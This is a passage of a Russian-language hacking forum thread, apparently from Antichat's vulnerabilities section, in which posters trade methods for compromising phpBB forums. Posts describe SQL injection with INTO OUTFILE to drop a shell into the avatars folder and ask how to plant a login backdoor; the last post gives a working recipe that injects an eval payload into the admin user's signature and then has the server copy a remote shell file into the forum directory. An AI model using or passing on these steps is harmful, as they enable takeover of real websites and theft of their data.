ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 17.04.2008, 21:25
Аватар для number0
number0
Познающий
Регистрация: 01.03.2008
Сообщений: 39
Провел на форуме:
210936

Репутация: 24
По умолчанию

Посмотрел логи апача... логи молчат. никаких соденений не устанавливалось на отдачу файлика db.txt
 
Ответить с цитированием

  #22  
Старый 27.04.2008, 00:26
Аватар для Nek1t
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

А что делать если profile.php просто нету?
Цитата:
Not Found
The requested URL /phpBB2/profile.php was not found on this server.
 
Ответить с цитированием

  #23  
Старый 19.05.2008, 12:26
Аватар для tmp
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234

Репутация: 56
По умолчанию

Схожая проблема, только чуть сложнее
2.0.21 чистый (без модов).
Админка есть
нулевой байт экранируется
мускуль-иньекция в скрипте ЦМС (не пхпбб)
чкрез восстановление БД - то же не получится, форум криво настроен, что нельзя сделать декап БД (оказалось что иногда криворукость помогает))))
Не пойму другого:
стараюсь делать через иньекцию INTO OUTFILE в */avatars/shel.php через CHAR или через 0x
Сервер мне только выдает строку в странице ту что после select но в файл не выводит
LOAD_FILE - вообще ни чего не выводит, но это я понял на всех хостингах, на моем тоже не выводит при чистом запросе из мускуль клиента.
Можно что то еще сделать по этим признакам?
спасибо
ЗЫ
Все работает!! Это я про експлоит Шанкара, рано разочаровался, то экранировало нул. байт в запросе SQL а через эксплойт все прошло! Вери гуд!

Последний раз редактировалось tmp; 22.05.2008 в 03:53..
 
Ответить с цитированием

  #24  
Старый 01.06.2008, 13:32
Аватар для DiegoSun
DiegoSun
Новичок
Регистрация: 06.12.2007
Сообщений: 1
Провел на форуме:
17618

Репутация: 0
По умолчанию

Не могу найти тему. Если кто помнит подскажите. Как сохранить возможность в phpbb заходить под любым логином. Там надо было добавить код при авторизации (был нужен доступ по ftp)
 
Ответить с цитированием

  #25  
Старый 11.04.2010, 18:06
Аватар для $cr1pt
$cr1pt
Новичок
Регистрация: 25.02.2010
Сообщений: 15
Провел на форуме:
33889

Репутация: 2
Отправить сообщение для $cr1pt с помощью ICQ
По умолчанию

проще всего залить шелл:
создаем 1.sql cо следующим содержанием:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;

далее:
profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');

Всё готово

Последний раз редактировалось $cr1pt; 11.04.2010 в 18:09..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
webshell scripts -) blackybr PHP, PERL, MySQL, JavaScript 20 28.03.2010 02:17
заливка шела через Koobi CMS vp$ Сценарии/CMF/СMS 2 14.06.2008 08:43
Unix shell: работа, программы SSH PandoraBox Soft - *nix 3 08.04.2008 23:58
бэкап бд в phpBB2 Plus IGEMON Форумы 6 09.02.2008 01:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ